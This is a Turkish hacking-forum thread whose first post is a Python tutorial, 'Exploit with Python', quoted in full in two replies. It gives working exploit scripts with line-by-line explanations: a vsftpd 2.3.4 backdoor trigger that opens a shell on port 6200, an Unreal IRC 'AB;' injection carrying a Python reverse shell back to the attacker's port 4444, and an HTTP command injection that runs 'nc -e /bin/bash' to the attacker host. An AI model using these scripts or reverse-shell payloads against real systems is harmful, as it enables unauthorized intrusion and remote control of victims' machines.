Exploit with Python

Eagleweb

Kıdemli Üye
8 May 2021
2,120
1,151
localhost/e8

Hello again with a long topic
Today I will try to tell you how to write an internet exploit in python.
I will take advantage of the 3 different deficits shown in this example most often.
Let's get into the subject if you want.
If we want to write an Internet-based exploit, we need to know network programming first.
The socket module is used in network programming with Python.

Certain parameters on the socket.
Python:
Allows you to make the connection via IPv4.
socket.AF_INET6: Allows you to make a connection over IPv6.
socket.SOCK_STREAM: Allows you to use the TCP protocol on the connection to be made.
socket.SOCK_DGRAM: Allows you to use the UDP protocol on the connection to be made.

socket.connect((h,p)): Connects to the specified IP address.(Users)
socket.bind((h,p)): Listens to the port with the specified IP.(Server)
socket.listen(): Decides the number to be connected to the listening address.
socket.accept(): Accepts people who want to connect.
socket.send(): Data is sent to the connected person.
socket.recv() : Gets the answer that will come from the link.
A basic connection can be established and contacted with these parameters.
These parameters will be sufficient because they will be at a very basic level in the exploits that we will already write.

Vsftpd 2.3.4
There are two main reasons why I chose the vsftpd vulnerability:
1- The maximum number of samples is due to the fact that the exploiting process takes place on its own.
2- There is no handler in the connection that will be made.
The way to exploit the vulnerability is to open a shell on port 6200 by bringing ":)" to the end of the answer to the user's username question as an escape parameter.

The code I wrote for this process is as follows:
Python:
02| import sys
03|
04| aux = socket(AF_INET,SOCK_STREAM)
05| host = sys.argv[1]
06| port = int(sys.argv[2])
07|
08|
09| aux.connect((host,port))
10| head = aux.recv(1024).strip()
11| if "(vsFTPd 2.3.4)" in head:
12|     aux.send("USER something:)\n")
13|     aux.recv(1024)
14|     aux.send("PASS againsomething\n")
15|     aux.close()
16|     print "My man! This port has got a vull.\n"
17| else:
18|     print "Sorry dude:( This is a normal port\n"
19|     exit()
20|
21|
22| exp = socket(AF_INET,SOCK_STREAM)
23|
24| exp.connect((host,6200))
25| while True:
26|     com = raw_input("#")    
27|     if com == "exit":
28|         exp.close()
29|         exit()
30|     exp.send(com + "\n")
31|     print exp.recv(1024)

Socket and sys modules that were prepared to run in the first 2 parts of the script were called.
4. the connection to be made in the line will be on TCP and IPv4, and the script has given a variable as aux to keep it short.
5. and 6. in the section, the desired host and port parameters are determined from the user.
9. the IP address specified in the line is connected to the port. Now all parameters with the aux variable will be processed via this link.
10., 11. and 17. in the section, the connected port is checked.
12. the first step of the exploiting process was done by sending the escape parameter with the data sent on the line.
13. the process continues by receiving the package that will arrive on the line.
14. and 15. make the last touch on the line and exit the connection.
22. in order to have a more understandable image when looking at the code with a new variable in line 4. the variable is given as in the line.
25. if a connection occurs on the line, a while loop opens that will continue unless it is logged out from within itself.
26. in the line, the hacker is requesting the desired data to be sent.
28. the line describes a quick exit process for convenience.
32. the data entered in the line is sent to the opposite party.

33. in response to the data sent in the line, there is an answer from the user and again on the 26th. switching to the line.

What our hacker brother saw :

suciw4l.png



What is happening on the network:
srkckgq.png

Unreal IRC
I preferred this vulnerability because it is an easy vulnerability, as well as an vulnerability where we can use a handler for exloiting.
In order to exploit the vulnerability, we can exploit the expected response from us with the "AB;" escape parameter after receiving the packets sent to us after the connection occurs and then write the code we want.

I wrote the following script for this process:

Python:
02| import sys
03|
04| thost, tport = sys.argv[1], int(sys.argv[2])
05| lhost = '"'+ sys.argv[3] +'"'
06|
07|
08| fir = socket(AF_INET,SOCK_STREAM)
09|
10| fir.connect((thost,tport))
11| payload = """AB;python -c 'import socket,subprocess,os;pay=socket.socket(socket.AF_INET,socket.SOCK_STREAM);pay.connect((""" + lhost + """,4444));os.dup2(pay.fileno(),0); os.dup2(pay.fileno(),1); os.dup2(pay.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
12| fir.send(payload)
13| fir.recv(1024)
14|
15|
16| han = socket(AF_INET,SOCK_STREAM)
17|
18| han.bind(("",4444))
19| han.listen(1)
20| fir.close()
21| cl = han.accept()
22| print cl.recv(1024)
23| while True:
24|     sh = cl.recv(1024)
25|     send = raw_input(sh)
26|     if send == "exit":
27|         han.close()
28|         exit()
29|     cl.send(send + "\n")
30|     data = cl.recv(1024)
31|     print data

The same operations were performed on others as in the previous exploit.
11. in the line, the upload module is defined, which will be sent after the connection is established. The module is written in python and its purpose is to connect to the hacker's port 4444 with sh(ell). In this, the escape parameter AB appears in the first part of it.
12. sending a download on the line.
13. in order not to break the server's heart, an answer packet is received on the line, but the hacker is not offered.
18. a listening port opens on the line to capture the shell connection that will be received by the server.
19. the number of users to be connected in the line is requested to be 1 device.
20. the line prompts you to end the connection that was sent to the previous download.
21. it is decided that the user who will be on the line will be assigned a variable named cl.
23. if there is a connection on the line, there is a while loop running.

The rest of the part is doing the same operation as the previous exploit.


What does our hacker brother see?:.
e5ald9o.png


What does Wireshark see?:.

r0gtbwy.png


Command Injection
There are also two reasons why I chose this deficit:
1- Due to the fact that it is an open one with an HTTP basis and, accordingly, exploit is written.
2- There are a lot of vulnerabilities with HTTP, and I chose this vulnerability using my laziness, because they are all similar to each other.
The way to exploit the vulnerability is that Command Injection requests data from you and runs this data on the command line and provides you with its output, if you use the "|" parameter as the escape directory, then the command you typed will work.

To do this, I wrote the following script:
Python:
02| import sys
03|
04| con = socket(AF_INET,SOCK_STREAM)
05| han = socket(AF_INET,SOCK_STREAM)
06| rhost, url, lhost = sys.argv[1], sys.argv[2], sys.argv[3]
07|
08| con.connect((rhost,80))
09| payload = "GET "+ url +"|%20nc%20"+ lhost +"%204444%20-e%20/bin/bash HTTP/1.1\nHost: "+ rhost +"\n\n"
10| han.bind(("",4444))
11| han.listen(1)
12| con.send(payload)
13|
14| cl = han.accept()
15| while True:
16|     send = raw_input("==>")
17|     cl.send(send + "\n")
18|     data = cl.recv(1024)
19|     print(data)

The first parts are doing the same process as the other exploits again.
9. in the line we make an HTTP request to the HTTP port. In the sent request, there is a command that will make a command injection.(|nc [IP address] [port] -e/bin/bash)
10-12. in its lines, the listening process is started and the request containing the bypass code is sent.
The rest of the parts are the same as the other exploits.(I hope you have noticed.)

Hacker bey is looking at the screen:.
38dh10x.png

Sipping Wireshark coffee:.

fp6zlv8.png


ljtrket.gif

Source:Python ile Exploit Yazmak
 
30 Kas 2021
122
56
root@wortex

Hello again with a long topic
Today I will try to tell you how to write an internet exploit in python.
I will take advantage of the 3 different deficits shown in this example most often.
Let's get into the subject if you want.
If we want to write an Internet-based exploit, we need to know network programming first.
The socket module is used in network programming with Python.

Certain parameters on the socket.
Python:
Allows you to make the connection via IPv4.
socket.AF_INET6: Allows you to make a connection over IPv6.
socket.SOCK_STREAM: Allows you to use the TCP protocol on the connection to be made.
socket.SOCK_DGRAM: Allows you to use the UDP protocol on the connection to be made.

socket.connect((h,p)): Connects to the specified IP address.(Users)
socket.bind((h,p)): Listens to the port with the specified IP.(Server)
socket.listen(): Decides the number to be connected to the listening address.
socket.accept(): Accepts people who want to connect.
socket.send(): Data is sent to the connected person.
socket.recv() : Gets the answer that will come from the link.
A basic connection can be established and contacted with these parameters.
These parameters will be sufficient because they will be at a very basic level in the exploits that we will already write.

Vsftpd 2.3.4
There are two main reasons why I chose the vsftpd vulnerability:
1- The maximum number of samples is due to the fact that the exploiting process takes place on its own.
2- There is no handler in the connection that will be made.
The way to exploit the vulnerability is to open a shell on port 6200 by bringing ":)" to the end of the answer to the user's username question as an escape parameter.

The code I wrote for this process is as follows:
Python:
02| import sys
03|
04| aux = socket(AF_INET,SOCK_STREAM)
05| host = sys.argv[1]
06| port = int(sys.argv[2])
07|
08|
09| aux.connect((host,port))
10| head = aux.recv(1024).strip()
11| if "(vsFTPd 2.3.4)" in head:
12|     aux.send("USER something:)\n")
13|     aux.recv(1024)
14|     aux.send("PASS againsomething\n")
15|     aux.close()
16|     print "My man! This port has got a vull.\n"
17| else:
18|     print "Sorry dude:( This is a normal port\n"
19|     exit()
20|
21|
22| exp = socket(AF_INET,SOCK_STREAM)
23|
24| exp.connect((host,6200))
25| while True:
26|     com = raw_input("#")   
27|     if com == "exit":
28|         exp.close()
29|         exit()
30|     exp.send(com + "\n")
31|     print exp.recv(1024)

Socket and sys modules that were prepared to run in the first 2 parts of the script were called.
4. the connection to be made in the line will be on TCP and IPv4, and the script has given a variable as aux to keep it short.
5. and 6. in the section, the desired host and port parameters are determined from the user.
9. the IP address specified in the line is connected to the port. Now all parameters with the aux variable will be processed via this link.
10., 11. and 17. in the section, the connected port is checked.
12. the first step of the exploiting process was done by sending the escape parameter with the data sent on the line.
13. the process continues by receiving the package that will arrive on the line.
14. and 15. make the last touch on the line and exit the connection.
22. in order to have a more understandable image when looking at the code with a new variable in line 4. the variable is given as in the line.
25. if a connection occurs on the line, a while loop opens that will continue unless it is logged out from within itself.
26. in the line, the hacker is requesting the desired data to be sent.
28. the line describes a quick exit process for convenience.
32. the data entered in the line is sent to the opposite party.

33. in response to the data sent in the line, there is an answer from the user and again on the 26th. switching to the line.

What our hacker brother saw :

suciw4l.png



What is happening on the network:
srkckgq.png

Unreal IRC
I preferred this vulnerability because it is an easy vulnerability, as well as an vulnerability where we can use a handler for exloiting.
In order to exploit the vulnerability, we can exploit the expected response from us with the "AB;" escape parameter after receiving the packets sent to us after the connection occurs and then write the code we want.

I wrote the following script for this process:

Python:
02| import sys
03|
04| thost, tport = sys.argv[1], int(sys.argv[2])
05| lhost = '"'+ sys.argv[3] +'"'
06|
07|
08| fir = socket(AF_INET,SOCK_STREAM)
09|
10| fir.connect((thost,tport))
11| payload = """AB;python -c 'import socket,subprocess,os;pay=socket.socket(socket.AF_INET,socket.SOCK_STREAM);pay.connect((""" + lhost + """,4444));os.dup2(pay.fileno(),0); os.dup2(pay.fileno(),1); os.dup2(pay.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
12| fir.send(payload)
13| fir.recv(1024)
14|
15|
16| han = socket(AF_INET,SOCK_STREAM)
17|
18| han.bind(("",4444))
19| han.listen(1)
20| fir.close()
21| cl = han.accept()
22| print cl.recv(1024)
23| while True:
24|     sh = cl.recv(1024)
25|     send = raw_input(sh)
26|     if send == "exit":
27|         han.close()
28|         exit()
29|     cl.send(send + "\n")
30|     data = cl.recv(1024)
31|     print data

The same operations were performed on others as in the previous exploit.
11. in the line, the upload module is defined, which will be sent after the connection is established. The module is written in python and its purpose is to connect to the hacker's port 4444 with sh(ell). In this, the escape parameter AB appears in the first part of it.
12. sending a download on the line.
13. in order not to break the server's heart, an answer packet is received on the line, but the hacker is not offered.
18. a listening port opens on the line to capture the shell connection that will be received by the server.
19. the number of users to be connected in the line is requested to be 1 device.
20. the line prompts you to end the connection that was sent to the previous download.
21. it is decided that the user who will be on the line will be assigned a variable named cl.
23. if there is a connection on the line, there is a while loop running.

The rest of the part is doing the same operation as the previous exploit.


What does our hacker brother see?:.
e5ald9o.png


What does Wireshark see?:.

r0gtbwy.png


Command Injection
There are also two reasons why I chose this deficit:
1- Due to the fact that it is an open one with an HTTP basis and, accordingly, exploit is written.
2- There are a lot of vulnerabilities with HTTP, and I chose this vulnerability using my laziness, because they are all similar to each other.
The way to exploit the vulnerability is that Command Injection requests data from you and runs this data on the command line and provides you with its output, if you use the "|" parameter as the escape directory, then the command you typed will work.

To do this, I wrote the following script:
Python:
02| import sys
03|
04| con = socket(AF_INET,SOCK_STREAM)
05| han = socket(AF_INET,SOCK_STREAM)
06| rhost, url, lhost = sys.argv[1], sys.argv[2], sys.argv[3]
07|
08| con.connect((rhost,80))
09| payload = "GET "+ url +"|%20nc%20"+ lhost +"%204444%20-e%20/bin/bash HTTP/1.1\nHost: "+ rhost +"\n\n"
10| han.bind(("",4444))
11| han.listen(1)
12| con.send(payload)
13|
14| cl = han.accept()
15| while True:
16|     send = raw_input("==>")
17|     cl.send(send + "\n")
18|     data = cl.recv(1024)
19|     print(data)

The first parts are doing the same process as the other exploits again.
9. in the line we make an HTTP request to the HTTP port. In the sent request, there is a command that will make a command injection.(|nc [IP address] [port] -e/bin/bash)
10-12. in its lines, the listening process is started and the request containing the bypass code is sent.
The rest of the parts are the same as the other exploits.(I hope you have noticed.)

Hacker bey is looking at the screen:.
38dh10x.png

Sipping Wireshark coffee:.

fp6zlv8.png


ljtrket.gif

Source:Python ile Exploit Yazmak
sağol kral yararlı oldu
 

CasPeRAB

Uzman üye
7 Kas 2021
1,144
461
TR❤AZ

Hello again with a long topic
Today I will try to tell you how to write an internet exploit in python.
I will take advantage of the 3 different deficits shown in this example most often.
Let's get into the subject if you want.
If we want to write an Internet-based exploit, we need to know network programming first.
The socket module is used in network programming with Python.

Certain parameters on the socket.
Python:
Allows you to make the connection via IPv4.
socket.AF_INET6: Allows you to make a connection over IPv6.
socket.SOCK_STREAM: Allows you to use the TCP protocol on the connection to be made.
socket.SOCK_DGRAM: Allows you to use the UDP protocol on the connection to be made.

socket.connect((h,p)): Connects to the specified IP address.(Users)
socket.bind((h,p)): Listens to the port with the specified IP.(Server)
socket.listen(): Decides the number to be connected to the listening address.
socket.accept(): Accepts people who want to connect.
socket.send(): Data is sent to the connected person.
socket.recv() : Gets the answer that will come from the link.
A basic connection can be established and contacted with these parameters.
These parameters will be sufficient because they will be at a very basic level in the exploits that we will already write.

Vsftpd 2.3.4
There are two main reasons why I chose the vsftpd vulnerability:
1- The maximum number of samples is due to the fact that the exploiting process takes place on its own.
2- There is no handler in the connection that will be made.
The way to exploit the vulnerability is to open a shell on port 6200 by bringing ":)" to the end of the answer to the user's username question as an escape parameter.

The code I wrote for this process is as follows:
Python:
02| import sys
03|
04| aux = socket(AF_INET,SOCK_STREAM)
05| host = sys.argv[1]
06| port = int(sys.argv[2])
07|
08|
09| aux.connect((host,port))
10| head = aux.recv(1024).strip()
11| if "(vsFTPd 2.3.4)" in head:
12|     aux.send("USER something:)\n")
13|     aux.recv(1024)
14|     aux.send("PASS againsomething\n")
15|     aux.close()
16|     print "My man! This port has got a vull.\n"
17| else:
18|     print "Sorry dude:( This is a normal port\n"
19|     exit()
20|
21|
22| exp = socket(AF_INET,SOCK_STREAM)
23|
24| exp.connect((host,6200))
25| while True:
26|     com = raw_input("#")   
27|     if com == "exit":
28|         exp.close()
29|         exit()
30|     exp.send(com + "\n")
31|     print exp.recv(1024)

Socket and sys modules that were prepared to run in the first 2 parts of the script were called.
4. the connection to be made in the line will be on TCP and IPv4, and the script has given a variable as aux to keep it short.
5. and 6. in the section, the desired host and port parameters are determined from the user.
9. the IP address specified in the line is connected to the port. Now all parameters with the aux variable will be processed via this link.
10., 11. and 17. in the section, the connected port is checked.
12. the first step of the exploiting process was done by sending the escape parameter with the data sent on the line.
13. the process continues by receiving the package that will arrive on the line.
14. and 15. make the last touch on the line and exit the connection.
22. in order to have a more understandable image when looking at the code with a new variable in line 4. the variable is given as in the line.
25. if a connection occurs on the line, a while loop opens that will continue unless it is logged out from within itself.
26. in the line, the hacker is requesting the desired data to be sent.
28. the line describes a quick exit process for convenience.
32. the data entered in the line is sent to the opposite party.

33. in response to the data sent in the line, there is an answer from the user and again on the 26th. switching to the line.

What our hacker brother saw :

suciw4l.png



What is happening on the network:
srkckgq.png

Unreal IRC
I preferred this vulnerability because it is an easy vulnerability, as well as an vulnerability where we can use a handler for exloiting.
In order to exploit the vulnerability, we can exploit the expected response from us with the "AB;" escape parameter after receiving the packets sent to us after the connection occurs and then write the code we want.

I wrote the following script for this process:

Python:
02| import sys
03|
04| thost, tport = sys.argv[1], int(sys.argv[2])
05| lhost = '"'+ sys.argv[3] +'"'
06|
07|
08| fir = socket(AF_INET,SOCK_STREAM)
09|
10| fir.connect((thost,tport))
11| payload = """AB;python -c 'import socket,subprocess,os;pay=socket.socket(socket.AF_INET,socket.SOCK_STREAM);pay.connect((""" + lhost + """,4444));os.dup2(pay.fileno(),0); os.dup2(pay.fileno(),1); os.dup2(pay.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
12| fir.send(payload)
13| fir.recv(1024)
14|
15|
16| han = socket(AF_INET,SOCK_STREAM)
17|
18| han.bind(("",4444))
19| han.listen(1)
20| fir.close()
21| cl = han.accept()
22| print cl.recv(1024)
23| while True:
24|     sh = cl.recv(1024)
25|     send = raw_input(sh)
26|     if send == "exit":
27|         han.close()
28|         exit()
29|     cl.send(send + "\n")
30|     data = cl.recv(1024)
31|     print data

The same operations were performed on others as in the previous exploit.
11. in the line, the upload module is defined, which will be sent after the connection is established. The module is written in python and its purpose is to connect to the hacker's port 4444 with sh(ell). In this, the escape parameter AB appears in the first part of it.
12. sending a download on the line.
13. in order not to break the server's heart, an answer packet is received on the line, but the hacker is not offered.
18. a listening port opens on the line to capture the shell connection that will be received by the server.
19. the number of users to be connected in the line is requested to be 1 device.
20. the line prompts you to end the connection that was sent to the previous download.
21. it is decided that the user who will be on the line will be assigned a variable named cl.
23. if there is a connection on the line, there is a while loop running.

The rest of the part is doing the same operation as the previous exploit.


What does our hacker brother see?:.
e5ald9o.png


What does Wireshark see?:.

r0gtbwy.png


Command Injection
There are also two reasons why I chose this deficit:
1- Due to the fact that it is an open one with an HTTP basis and, accordingly, exploit is written.
2- There are a lot of vulnerabilities with HTTP, and I chose this vulnerability using my laziness, because they are all similar to each other.
The way to exploit the vulnerability is that Command Injection requests data from you and runs this data on the command line and provides you with its output, if you use the "|" parameter as the escape directory, then the command you typed will work.

To do this, I wrote the following script:
Python:
02| import sys
03|
04| con = socket(AF_INET,SOCK_STREAM)
05| han = socket(AF_INET,SOCK_STREAM)
06| rhost, url, lhost = sys.argv[1], sys.argv[2], sys.argv[3]
07|
08| con.connect((rhost,80))
09| payload = "GET "+ url +"|%20nc%20"+ lhost +"%204444%20-e%20/bin/bash HTTP/1.1\nHost: "+ rhost +"\n\n"
10| han.bind(("",4444))
11| han.listen(1)
12| con.send(payload)
13|
14| cl = han.accept()
15| while True:
16|     send = raw_input("==>")
17|     cl.send(send + "\n")
18|     data = cl.recv(1024)
19|     print(data)

The first parts are doing the same process as the other exploits again.
9. in the line we make an HTTP request to the HTTP port. In the sent request, there is a command that will make a command injection.(|nc [IP address] [port] -e/bin/bash)
10-12. in its lines, the listening process is started and the request containing the bypass code is sent.
The rest of the parts are the same as the other exploits.(I hope you have noticed.)

Hacker bey is looking at the screen:.
38dh10x.png

Sipping Wireshark coffee:.

fp6zlv8.png


ljtrket.gif

Source:Python ile Exploit Yazmak
Nice Topic Bro Health to your hands
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.